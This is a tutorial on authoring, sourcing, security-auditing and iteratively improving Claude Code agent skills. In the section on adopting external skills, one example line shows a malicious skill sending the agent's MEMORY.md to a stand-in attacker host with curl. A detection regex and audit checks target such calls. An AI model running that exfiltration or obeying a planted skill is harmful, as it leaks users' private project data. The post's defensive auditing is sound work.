Skills are the most powerful part of any agentic workflow, and they’re also the easiest to get wrong. This post covers the full lifecycle: writing a skill from scratch, finding and adopting skills from the community, and closing the loop so your skills improve over time.
You’ve set up the memory system, run the heartbeat a few times, and started to feel what a directed AI session actually looks like. Now you want to push further. Maybe there’s a workflow your team runs every sprint that the AI keeps getting slightly wrong. Maybe you found a skill on GitHub that looks useful but you’re not sure if it’s safe to drop into your project. Maybe your TDD skill has drifted from how you actually run tests.
This post is about taking control of that. Not just using skills, but writing them, sourcing them, auditing them, and feeding improvements back into the system.
Part 1 of this series covered the framework itself. This post assumes you have it running and want to go deeper.
This post focuses primarily on Claude Code's skill system (the `.claude/skills/` directory format), since that's what I use. The concepts apply to other AI coding tools that support similar skill formats, but the specific commands and file paths are Claude Code's.
What a skill actually is
A skill is a markdown file with frontmatter that tells the AI agent what to do and when. That’s it. No binary, no plugin system, no build step. The intelligence comes from the AI agent; the skill provides the structure, the constraints, and the memory of how your team does things.
This distinction matters. When /dev-tdd-backend runs a test-driven development cycle, the AI agent is still doing the reasoning. The skill is the scaffold: “start with a failing test, run it, write minimal code, run it again, refactor.” Without the skill, the AI agent might write the whole feature first and add tests after. The skill holds the pattern in place.
Skills live in .claude/skills/. Each skill is a directory:
```
.claude/skills/
└── dev-code-review/
    ├── SKILL.md              # Required — instructions and frontmatter
    ├── references/           # Optional — detailed docs, loaded on demand
    │   └── review-criteria.md
    └── examples/             # Optional — example outputs
        └── sample-review.md
```
The directory name is also the command name. /dev-code-review invokes the skill. The {category}-{function} naming convention is enforced for a reason: it keeps the catalog organized and avoids collisions when you adopt skills from other sources.
Writing a skill from scratch
Start simple. Here’s a minimal skill that enforces a deployment checklist:
```markdown
---
name: ops-deploy-checklist
description: >
  Run the pre-deployment checklist before any production release.
  Use when the user says "deploy", "release", "push to prod", or
  "ready to release". Does NOT trigger for test environment deploys.
disable-model-invocation: true
user-invocable: true
argument-hint: "[environment: prod|staging]"
version: 1.0.0
---

# Deploy Checklist

Run this before every production deployment.

## Step 1: Pre-flight

1. Confirm the target environment: ask if not provided
2. Run `git status` — working tree must be clean
3. Check the last CI run: `gh run list --branch main --limit 1`
4. If CI failed, stop and report — do not proceed

## Step 2: Verify

5. Run smoke tests: `dotnet test --filter Category=Smoke`
6. Check current health endpoint: `curl -s https://api.example.com/health`
7. Confirm rollback plan: "What's the last known-good version?"

## Step 3: Deploy

8. Run the deployment script: `./scripts/deploy.ps1 -Environment $environment`
9. Monitor the deployment log for 60 seconds
10. Re-check health endpoint after deployment

## Step 4: Confirm

11. Run smoke tests against the live environment
12. Log to daily memory: deployed version, timestamp, deployer
13. Update the deployment runbook if anything was different this time
```
A few things to notice. The description field is written like search terms, not like documentation. It specifies trigger phrases and explicitly says when NOT to trigger. That negative clause matters: without it, the AI agent might run the production checklist every time you mention “deploy to staging.”
disable-model-invocation: true means the AI agent cannot auto-trigger this skill. Only you can invoke it with /ops-deploy-checklist. For anything that touches production, that’s the right call.
Frontmatter fields you’ll use most
| Field | What it controls |
|---|---|
| `name` | The `/command` name and catalog identifier |
| `description` | When the AI agent auto-triggers (and when not to) |
| `disable-model-invocation` | Set `true` for destructive or high-stakes actions |
| `user-invocable` | Set `false` for background conventions the AI agent applies automatically |
| `allowed-tools` | Restrict which tools this skill can use (`Bash(dotnet test *)`) |
| `context` | Set `fork` to run the skill in an isolated subagent |
| `version` | Track changes over time; required if you plan to contribute back |
| `argument-hint` | Shown in autocomplete when you type `/skill-name` |
The invocation matrix
Three settings, three behavior modes. It’s worth understanding this table before you write your first skill:
| Setting | User can invoke | AI agent auto-triggers | Use case |
|---|---|---|---|
| Default | Yes | Yes | Code review, explain, summarize |
| `disable-model-invocation: true` | Yes | No | Deploy, commit, release, delete |
| `user-invocable: false` | No | Yes | Background conventions, style guides |
Most skills are default: both you and the AI agent can invoke them. Destructive operations should have disable-model-invocation: true. Background knowledge that the AI agent should apply silently (your team’s naming conventions, for example) gets user-invocable: false.
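In frontmatter, the three modes differ by just those two flags. A sketch (skill names are illustrative):

```yaml
# Default: no flags needed. Both you and the AI agent can invoke it.
name: dev-code-review

# High-stakes: only you can run it, via /ops-deploy-checklist
name: ops-deploy-checklist
disable-model-invocation: true

# Background convention: the AI agent applies it silently; you never type it
name: dev-naming-conventions
user-invocable: false
```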
Naming conventions
The prefix determines the category. Pick the one that fits:
| Prefix | Category |
|---|---|
| `meta-` | Framework and workflow management |
| `dev-` | Development tasks (TDD, code review, debugging) |
| `ops-` | Operations and infrastructure |
| `tool-` | Integrations with specific tools |
| `viz-` | Visualization and diagrams |
| `str-` | Strategy and research |
If none of these fit, create a new prefix. Keep it 2-4 characters. Document it in your CLAUDE.md.
Using the Claude Code skill creator
Claude Code ships with a built-in /skill-creator that handles the full lifecycle of creating and testing skills. This is the fastest way to go from idea to working skill.
Tell it what you want: “I need a skill that runs our deployment checklist for production releases.” It drafts the frontmatter, structures the instructions, and sets up the directory. But the real value is in what comes next.
Benchmarking and trigger accuracy. The skill-creator runs evals against your skill. It tests trigger phrases that should activate the skill (“deploy to production”, “ready to release”) and verifies they do. Then it tests similar phrases that shouldn’t trigger it (“deploy to staging”, “run the tests”) and verifies they don’t. This catches the common problem of skills that activate too broadly or too narrowly.
Variance analysis. It runs the skill multiple times to check whether it produces consistent results or whether the output varies wildly between runs. A good skill should produce similar structure and quality each time, even if the specific content changes.
Iterative improvement. After benchmarking, it suggests changes to the description, the instructions, or the frontmatter settings. You apply them, benchmark again, and iterate until the skill triggers accurately and performs consistently.
This workflow applies whether you’re creating a skill from scratch or improving one you adopted from the community. Found a skill online that almost does what you need? Adopt it with /meta-adopt-skill, then run it through the skill-creator’s benchmark to see where it falls short, and improve it.
Finding skills online
You don’t have to write everything yourself. The community shares skills through GitHub repositories and the Claude Code plugin marketplace.
The /plugin marketplace
Claude Code has a built-in marketplace command:
```
# Browse what's available
/plugin

# Install from the official channel
/plugin install skill-name@claude-plugins-official

# Add a community marketplace source
/plugin marketplace add owner/repo
```
Skills installed from the marketplace are namespaced, so you invoke them as /namespace:skill-name. This avoids collisions with skills you’ve written locally.
Community repositories
A few collections worth bookmarking:
| Repository | What’s there |
|---|---|
| anthropics/skills | Official Anthropic skills |
| hesreallyhim/awesome-claude-code | Curated list of skills, hooks, and tools |
| VoltAgent/awesome-agent-skills | 500+ community skills |
| sickn33/antigravity-awesome-skills | 1000+ skills collection |
Individual skills also turn up in blog posts and documentation. The Claude Code docs maintain a reference list. When you find one you want to try, the next step is not to copy-paste it into your project blindly.
Adopting an external skill safely
Skills can execute bash commands, read and write files, and make API calls. A skill that says it "runs your test suite" could also run `curl https://attacker.example.com -d @context/MEMORY.md`. That's unlikely from a well-known source, but worth checking.
/meta-adopt-skill handles this. Give it a GitHub URL or a local path and it walks through seven steps before touching anything in your project.
```
/meta-adopt-skill https://github.com/coleam00/excalidraw-diagram-skill
```
Here’s what the output looks like for a real adoption:
```markdown
### Skill Adoption Review: excalidraw-diagram

**Source:** github.com/coleam00/excalidraw-diagram-skill
**Security Risk:** Low (generates HTML files, no external calls)
**Overlap:** None found in catalog
**Category:** viz
**Proposed Name:** viz-excalidraw-diagram

#### What It Does

Generates interactive Excalidraw diagrams from natural language descriptions.
Creates .excalidraw files that can be opened in Excalidraw or embedded in docs.

#### Changes Needed

- Rename from "excalidraw-diagram" to "viz-excalidraw-diagram"
- Add disable-model-invocation: true (generates files, user should control when)
- Update description trigger phrases to match this project's vocabulary

#### Recommendation

Adopt with changes

Approve? (y/n)
```
Nothing happens until you type y. After approval, the skill directory is created, the adapted SKILL.md is written, and the catalog is updated. The adoption decision is logged to today’s daily memory file so you have a record of what came from where.
What the security audit actually checks
The seven-step process covers:
- Fetch the full skill directory, not just SKILL.md
- Read every script file bundled with the skill
- Check all bash commands: what exactly does it run? Any `rm`, any `curl` to external URLs?
- Check `allowed-tools`: broad access (`Bash(*)`) gets flagged
- Check for instructions that tell the AI agent to send data externally
- Rate the risk: Low, Medium, or High
- High-risk skills stop the process and require you to explicitly acknowledge the risk before proceeding
A Low rating means read-only, no bash, no external calls. Medium means scoped bash commands with no external calls. High means broad access, external URLs, or unclear scripts. The adoption will not proceed on High risk without you actively choosing to continue.
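That three-level rule is simple enough to sketch in Python. This is an illustration of the rating logic described above, not the actual implementation behind /meta-adopt-skill; the regex and function name are mine:

```python
import re

# Matches shell commands that ship data to an external URL
EXTERNAL_CALL = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b\s+\S*https?://", re.I)

def rate_skill_risk(skill_text: str, allowed_tools: str) -> str:
    """Rate a skill per the rule above:
    High   = broad tool access or calls to external URLs
    Medium = scoped bash commands, no external calls
    Low    = read-only: no bash, no external calls
    """
    if "Bash(*)" in allowed_tools or EXTERNAL_CALL.search(skill_text):
        return "High"
    if "Bash(" in allowed_tools:
        return "Medium"
    return "Low"
```

A skill scoped to `Bash(dotnet test *)` rates Medium; one that pipes a memory file to an external host rates High regardless of its tool declarations.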
Overlap analysis
The second major check is whether the new skill would conflict with something you already have. If you have dev-code-review and you try to adopt an external dev-review-assistant, the AI agent now has two skills that activate for the same trigger phrases. That creates unpredictable behavior.
The adoption process reads your catalog.json and compares trigger phrases, function descriptions, and names. If it finds overlap, it tells you what overlaps and gives you three choices: adopt anyway (if they’re different enough to coexist), merge the new skill’s ideas into the existing one, or skip.
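The trigger-phrase comparison can be pictured as a set intersection. A sketch, assuming a simplified catalog entry shape (`{'name', 'triggers'}`) rather than the real catalog.json schema:

```python
def find_overlaps(catalog: list[dict], candidate: dict) -> list[tuple[str, list[str]]]:
    """For each skill already in the catalog, list the trigger
    phrases it shares with the candidate skill (case-insensitive)."""
    cand = {p.lower() for p in candidate["triggers"]}
    overlaps = []
    for skill in catalog:
        shared = cand & {p.lower() for p in skill["triggers"]}
        if shared:
            overlaps.append((skill["name"], sorted(shared)))
    return overlaps
```

If `dev-code-review` and an incoming `dev-review-assistant` both list "code review" as a trigger, this surfaces the collision before the two skills start competing for the same phrases.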
Managing your skill inventory
After a few months, you’ll have skills from multiple sources: some you wrote, some adopted, some from the central workflow repository. /meta-skill-catalog keeps this manageable.
Three commands cover most of what you need:
Inventory: Compare what’s on disk against what’s registered in catalog.json:
```
/meta-skill-catalog
```
This shows you skills that exist on disk but aren’t registered (you copied a directory without updating the catalog), skills registered but missing from disk (something got deleted), and skills with stale metadata.
Audit: Check for structural problems across all skills:
```
/meta-skill-catalog audit
```
The audit checks naming conventions, description quality (is it specific enough to trigger correctly?), trigger overlaps between skills, file size (over 500 lines suggests the skill should be split), and whether version fields are present.
Rebuild: When things drift, start fresh from disk:
```
/meta-skill-catalog rebuild
```
Scans every SKILL.md in .claude/skills/, reads the frontmatter, and writes a new catalog.json from scratch. Use this after bulk operations or if you suspect the catalog is out of sync.
The catalog format tracks provenance per skill: where it came from, what version was installed, and when. When the upstream workflow repository updates a skill, you can compare your installed version against the new one before deciding to upgrade.
The improvement loop
Writing a skill once is the start. Making it better over time is where the real value compounds.
The loop has four stages.
Stage 1: Detect patterns
/meta-continuous-learning reads your daily session logs and looks for recurring situations. It’s not automatic. You run it at the end of a session, or during /meta-wrap-up, and it surfaces candidates:
```markdown
### Extracted Patterns

| # | Pattern | Confidence | Destination | Action |
|---|---------|-----------|-------------|--------|
| 1 | TDD skill runs unit tests first, but our integration tests need to run before coverage is meaningful | High | dev-tdd-backend | Update skill |
| 2 | Always check Aspire resource logs before restarting a service | Medium | MEMORY.md | Add to Lessons Learned |
| 3 | Use trash instead of rm for recoverable deletes | High | SOUL.md | Already there ✓ |

Apply all? Or select specific ones?
```
The confidence rating uses a simple rule: High means you’ve hit this pattern three or more times and confirmed it, Medium means once or twice but seems generalizable, Low means single occurrence that might be situational. Low-confidence patterns go to MEMORY.md as a note rather than immediately updating a skill.
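As code, that rule might look like this (a sketch of the heuristic, not the skill's actual logic):

```python
def pattern_confidence(occurrences: int, generalizable: bool) -> str:
    """3+ confirmed hits = High; fewer but generalizable = Medium;
    a one-off that might be situational = Low."""
    if occurrences >= 3:
        return "High"
    if generalizable:
        return "Medium"
    return "Low"

def destination(confidence: str) -> str:
    """Low-confidence patterns become a MEMORY.md note rather
    than immediately updating a skill."""
    return "MEMORY.md note" if confidence == "Low" else "skill update"
```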
Nothing is applied without your approval. The skill lists what it found, you decide what to act on.
Stage 2: Edit the skill
With a candidate identified, you edit the SKILL.md directly. This is just a file edit. Add the step, fix the description, reorder the phases. There’s no compilation, no deploy, no restart. The next time the skill runs, it uses the updated instructions.
One practical note: when you modify an installed skill, the session wrap-up will ask you to classify the change:
```
[SKILL ADAPTATION] Detected modifications to dev-tdd-backend.
Classify this adaptation? (universal / stack-specific / project-specific / skip)
```
- Universal: Any project using this stack would benefit from this change
- Stack-specific: Useful for the same stack but might need tweaking elsewhere
- Project-specific: Only relevant to this project’s particular setup
This classification determines whether the adaptation should flow back to the central workflow repository.
Stage 3: Package and contribute
If a change is universal or stack-specific, it’s worth sending upstream. /meta-contribute-back handles the packaging:
```
/meta-contribute-back dev-tdd-backend
```
It reads context/adaptations.md, finds the pending contributions for that skill, reads the diff between your modified version and the original source skill, and writes a contribution file in a human-readable format — not a raw git diff, but a structured description of what changed and why. This gets committed to a contrib/your-project/dev-tdd-backend branch in the central workflow repository.
The contribution file format is intentional. A reviewer in the central repository needs to understand the motivation without having access to your project. The format includes what changed, why it was needed, what problem it solved, and any edge cases.
Stage 4: Review and merge
In the central workflow repository, /meta-merge-contributions handles the review side:
```
/meta-merge-contributions --list
```
This shows all pending contribution branches, grouped by skill. For each contribution, it shows the proposed change and asks for an action: merge, reject, or defer.
On merge, it applies the changes to the skill’s SKILL.md, bumps the version (content additions bump minor, wording fixes bump patch, structural changes bump major), appends a CHANGELOG entry with the contributing project credited, and deletes the contribution branch.
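The version-bump rule is plain semantic versioning. A sketch, with change-kind labels of my own choosing:

```python
def bump_version(version: str, change_kind: str) -> str:
    """Apply the merge rule: structural changes bump major,
    content additions bump minor, wording fixes bump patch."""
    major, minor, patch = (int(x) for x in version.split("."))
    if change_kind == "structural":
        return f"{major + 1}.0.0"
    if change_kind == "content":
        return f"{major}.{minor + 1}.0"
    if change_kind == "wording":
        return f"{major}.{minor}.{patch + 1}"
    raise ValueError(f"unknown change kind: {change_kind}")
```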
After that, projects running /meta-upgrade will see the new version available and can pull it in with version-aware diffing.
The whole loop — detect, edit, contribute, merge, distribute — means skills improve continuously across every project that uses them. A fix discovered in one project becomes available to all of them. That’s the compounding effect that makes the system worth investing in.
What the skill provides vs what the AI agent provides
There’s a question worth being clear about: when a skill works well, how much is the skill and how much is the model?
The skill provides structure and memory. It holds the workflow in place: the order of steps, the constraints, the things to check. Without the skill, the AI agent would improvise a different approach every time. With the skill, the approach is consistent.
The AI agent provides the judgment. Deciding whether a test failure is a real bug or a test setup issue, knowing when to deviate from the standard steps because the situation is unusual, writing code that fits the existing patterns in the codebase. None of that is in the SKILL.md.
This means skills don’t make a weaker model perform like a stronger one. They make any model apply your specific workflows instead of generic ones. The quality of the output still depends on the model’s capability. The consistency and specificity of the workflow depends on the skill.
It also means there’s a ceiling on how much you can fix with skills. If the AI agent keeps misunderstanding a concept, adding more steps to the skill won’t necessarily help. That’s a model limitation, not a workflow problem. The right fix there might be a rules file, a concrete example in the skill’s examples/ directory, or better context in MEMORY.md.
Putting it together
Start with one skill you’d reach for every week. A code review checklist, a deployment sequence, a documentation template. Write the SKILL.md, keep it under 100 lines at first, and run it a few times in real sessions.
Watch what it gets wrong. When the AI agent skips a step or misunderstands the intent, that’s signal. Adjust the instructions. After three or four sessions you’ll have something that fits how your team actually works, not how the documentation says you should work.
Then look outward. Browse the community repositories and the plugin marketplace. When something looks useful, run /meta-adopt-skill against it before adding it to your project. The audit takes a minute and protects you from the obvious problems.
Over time, run /meta-skill-catalog audit to check what you’ve accumulated. Skills you haven’t used in months might be worth removing. Skills with vague descriptions might be causing trigger conflicts you haven’t noticed yet. The audit makes these visible.
And when you improve a skill, classify the change. The extra thirty seconds of classification means the improvement has a path back to everyone else using the same workflow. That’s how a collection of personal productivity hacks becomes a shared team asset.
Skills are plain text files that teach an AI how to work. That’s deliberately simple. The power comes from curating them carefully, keeping them honest, and letting them evolve with what you learn.